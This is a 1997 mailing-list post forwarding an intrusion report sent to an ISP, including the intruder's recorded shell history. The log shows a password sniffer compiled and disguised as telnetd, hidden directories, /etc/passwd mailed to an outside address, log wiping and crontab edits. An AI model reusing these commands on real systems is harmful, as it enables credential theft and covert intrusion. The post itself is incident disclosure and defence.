[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: System Attack & FBI (fwd)
Jim,
I was almost in tears as I was reading your logs.
Instead of simply asking your users to change passwords (always a great
idea!) please let them know that multiuser Unix systems never offer any
real security or privacy to the users.
I hope that the hacker did not leave any other trojans besides rogue Apache
and in.telnetd.
igor
Jim Choate wrote:
>
> Hi,
>
> For your amusement.
>
> Jim Choate
> CyberTects
> [email protected]
>
>
> Forwarded message:
> > From [email protected] Fri May 23 23:28:29 1997
> > From: Jim Choate <[email protected]>
> > Message-Id: <[email protected]>
> > Subject: System Attack & FBI
> > To: [email protected]
> > Date: Fri, 23 May 1997 23:28:27 -0500 (CDT)
> > Cc: [email protected]
> > X-Mailer: ELM [version 2.4 PL23]
> > Content-Type: text
> > Content-Length: 7477
> >
> >
> > Hi,
> >
> > As you will see below I have been tracking a waskelly wabbit for the last
> > few weeks. I apologize for any interference with your access but I could
> > not let it go without some sort of responce.
> >
> > I *STRONGLY* advise you to change your password immediately.
> >
> > I do not expect anyone other than myself to have to talk with the FBI.
> >
> > If you have any questions please feel free to email me.
> >
> > Jim Choate
> > CyberTects
> > [email protected]
> >
> >
> > Forwarded message:
> >
> > > From [email protected] Fri May 23 23:13:34 1997
> > > Message-Id: <[email protected]>
> > > X-Sender: [email protected]
> > > X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
> > > Date: Fri, 23 May 1997 23:43:27 -0500
> > > To: Jim Choate <[email protected]>
> > > From: rberger <[email protected]>
> > > Subject: Re: You have a hacker!
> > > In-Reply-To: <[email protected]>
> > > Mime-Version: 1.0
> > > Content-Type: text/plain; charset="us-ascii"
> > >
> > > Thank you very much for sending us an e-mail and your logs. We are going
> > > through
> > > our FTP logs at this time. Although initial results don't show
> > > corresponding ftps at these
> > > times or files. Although a week ago we were fighting a hacker using the
> > > a same
> > > techquies as shown by the telnet sessions. So we will be monitoring
> > > everything very
> > > closely here for a few more days. Our next search will be the accounts
> > > logged in on
> > > these ports at the times given. We have been working with the FBI, along
> > > with several
> > > other ISP's in Dallas. If you capture any other logs please send them
> > > again to
> > > [email protected]. If you dont hear anything from us in less than 24 hours
> > > please re-send
> > > your e-mail message again to my domain [email protected] just in case the
> > > root e-mail/logs are being monitored & modified.
> > >
> > > Regards,
> > >
> > > Randall Berger, CEO
> > > AppLink Corporation
> > >
> > >
> > > At 10:43 PM 5/23/97 -0500, you wrote:
> > > >
> > > >Hello,
> > > >
> > > >
> > > > My name is Jim Choate, I own and operate CyberTects a small office - home
> > > > office consultancy in Austin, TX. Over the last couple of weeks I have been
> > > > tracking an intrusion on my system that has involved your systems. I would
> > > > appreciate any help you can provide in resolving this issue.
> > > >
> > > > I believe a home account for the perp is [email protected]
> > > >
> > > > I will attach below the relevant files.
> > > >
> > > >
> > > > Jim Choate
> > > > CyberTects
> > > > [email protected]
> > > >
> > > > --------------------------------------------------------------------------
> > > >
> > > > bbixler ttyp0 app42-73.applink Fri May 23 16:04 - 16:06 (00:01)
> > > > bbixler ttyp0 app42-75.applink Fri May 23 00:21 - 00:28 (00:07)
> > > > bbixler ttyp0 app42-90.applink Thu May 22 13:33 - 13:37 (00:03)
> > > > bbixler ttyp0 app41-50.applink Wed May 21 20:01 - 20:31 (00:30)
> > > > bbixler ttyp0 app41-47.applink Wed May 21 19:53 - 19:54 (00:00)
> > > > bbixler ttyp0 app42-85.applink Wed May 21 18:46 - 19:00 (00:14)
> > > > bbixler ttyp0 app42-75.applink Wed May 21 10:39 - 10:40 (00:00)
> > > > bbixler ttyp0 app41-52.applink Sun May 18 23:04 - 23:11 (00:07)
> > > > bbixler ttyp1 app42-78.applink Sat May 17 18:46 - 18:49 (00:02)
> > > > bbixler ttyp1 app42-67.applink Sat May 17 01:22 - 01:26 (00:03)
> > > > bbixler ftp fw6-10.ppp.iadfw Wed May 14 22:27 - 22:28 (00:01)
> > > > bbixler ttyp1 app42-94.applink Tue May 13 16:12 - 16:18 (00:05)
> > > > bbixler ttyp0 app42-85.applink Mon May 12 17:02 - 17:05 (00:02)
> > > > bbixler ttyp0 app42-73.applink Sun May 11 12:29 - 12:36 (00:07)
> > > > bbixler ttyp0 app42-71.applink Sat May 10 20:15 - 20:17 (00:01)
> > > > bbixler ttyp0 app42-71.applink Sat May 10 19:40 - 19:50 (00:09)
> > > > bbixler ttyp0 max2-800-04.eart Wed Feb 12 18:05 - 18:06 (00:00)
> > > >
> > > > wtmp begins Sun Feb 2 16:36
> > > >
> > > > --------------------------------------------------------------------------
> > > >
> > > > whoami
> > > > ls
> > > > mv perl-ex.sh /tmp/.bgg
> > > > mkdir /tmp/.bg
> > > > cd /tmp
> > > > cd .bg
> > > > ls
> > > > lynx
> > > > ls
> > > > gcc linsniffer.c
> > > > ls
> > > > ps
> > > > who
> > > > w
> > > > ps aux
> > > > a.out &
> > > > ls
> > > > ifconfig
> > > > /sbin/ifconfig
> > > > ls
> > > > tail -f tcp.log
> > > > free
> > > > ls
> > > > cat tcp.log
> > > > cd ..
> > > > ls
> > > > w
> > > > cd
> > > > cd ..
> > > > ls
> > > > cd ..
> > > > cd /etc
> > > > ls
> > > > minicom
> > > > cd ..
> > > > ls
> > > > cd cdrom.
> > > > cd cdrom
> > > > ls
> > > > cd ..
> > > > cd
> > > > ls
> > > > cd bin
> > > > ls
> > > > cd ..
> > > > cd ..
> > > > ls
> > > > w
> > > > finger
> > > > cd Pphantom
> > > > cat /etc/passwd | grep Pphantom
> > > > cd phantom
> > > > ls
> > > > ls -al
> > > > cat .bash_history
> > > > cd /etc
> > > > cat hosts
> > > > ls
> > > > cd /tmp
> > > > cd .bg
> > > > cat tcp.log
> > > > exit
> > > > cd .bg
> > > > ls
> > > > w
> > > > ls
> > > > ls -al
> > > > cat tcp.log
> > > > ifconfig
> > > > /sbin/ifconfig
> > > > ls
> > > > exit
> > > > mv x.sh /tmp
> > > > cd .bg
> > > > ls
> > > > cd /tmp
> > > > ls
> > > > mv x.sh .bg
> > > > cd .bg
> > > > ls
> > > > kill -9 14523
> > > > ps aux
> > > > mv a.out in.telnetd
> > > > ls
> > > > rm tcp.log
> > > > ./in.telnetd &
> > > > exit
> > > > pico tcp.log
> > > > ls
> > > > ps aux
> > > > kill -9 16282
> > > > ls
> > > > ./in.telnetd &
> > > > exit
> > > > cat /dev/null > tcp.log
> > > > w
> > > > exit
> > > > pico tcp.log
> > > > ls
> > > > ls -al
> > > > cd /etc
> > > > cat passwd
> > > > mail [email protected] < passwd
> > > > exit
> > > > w
> > > > ls -al
> > > > pico tcp.log
> > > > echo /dev/null > tcp.log
> > > > ls -al
> > > > ps aux
> > > > quit
> > > > exit
> > > > id
> > > > w
> > > > ftp
> > > > ls
> > > > mkdir /home/ftp/.tmp
> > > > mkdir /home/ftp/.tmp/.sub
> > > > mv linsniff /home/ftp/.tmp/.sub/
> > > > cd /home/ftp/.tmp/.sub/
> > > > mv linsniff in.te1netd
> > > > ls -l
> > > > chmod 755 in.te1netd
> > > > in.te1netd &
> > > > ps
> > > > ps aux
> > > > killall in.te1netd
> > > > ls
> > > > ls -a
> > > > ls -l
> > > > in.te1netd &
> > > > /home/ftp/.tmp/.sub/in.te1netd
> > > > /home/ftp/.tmp/.sub/in.te1netd
> > > > ls -s
> > > > rm in.te1netd
> > > > cd
> > > > ls
> > > > mv hello .h311o
> > > > ftp
> > > > ls
> > > > mv linsniffer.c /home/ftp/.tmp/.sub/
> > > > cd /home/ftp/.tmp/.sub
> > > > ls
> > > > cc linsniffer.c
> > > > mv a.out in.te1netd
> > > > chmod 755 in.te1netd
> > > > ls
> > > > rm linsniffer.c
> > > > in.te1netd &
> > > > exit
> > > > cd ..
> > > > mv apache.tgz .bg
> > > > cd .bg
> > > > ls
> > > > tar xfvz apache.tgz
> > > > cd apache_1.2b10/
> > > > ls
> > > > cd src
> > > > make
> > > > ls
> > > > ./Configure
> > > > make
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd cgi-bin/
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd ..
> > > > ls
> > > > w
> > > > rm -rf apache*
> > > > lynx
> > > > ls
> > > > tar xfvz apache_1.1.3.tar.gz
> > > > cd apache_1.1.3
> > > > ls
> > > > cd src
> > > > ls
> > > > ./Configure
> > > > make
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd ..
> > > > ls
> > > > rm -rf apache_1.1.3
> > > > ls
> > > > rm -rf apache_1.1.3.tar.gz
> > > > w
> > > > exit
> > > > kill -9 14551
> > > > ls
> > > > ls -al
> > > > cd ..
> > > > ls
> > > > cd /home
> > > > ls
> > > > cd ftp
> > > > ls -al
> > > > cd .tm[p
> > > > cd .tmp/
> > > > ls
> > > > ls -al
> > > > cd .sub/
> > > > ls
> > > > rm *
> > > > cd ..
> > > > cd ..
> > > > rm -rf .tmp/
> > > > ls
> > > > cd
> > > > ls
> > > > cd /root
> > > > ls
> > > > cd ssz
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd pgp
> > > > ls
> > > > cd ..
> > > > cd etc
> > > > ls
> > > > cd ..
> > > > ls
> > > > cd /
> > > > ls
> > > > exit
> > > > id
> > > > crontab -e
> > > > ls
> > > > vi .sub
> > > > crontab -e
> > > > ls
> > > > cat /home/ftp/.tmp/.sub/tcp.log
> > > > ps aux
> > > > who
> > > > cd /home/ftp
> > > > ls -a
> > > > mkdir .tmp/.sub
> > > > mkdir .tmp
> > > > cd .tmp
> > > > exit
> > > > cd
> > > > ls
> > > > cd /root
> > > > ls
> > > > cd khg-0.5/
> > > > ls
> > > > cd ..
> > > > cat .bash_history
> > > > ls
> > > > cd /etc
> > > > ls
> > > > cat hosts
> > > > exit
> > > >
> > > >
> > > >
> > > >
> > >
> >
>
- Igor.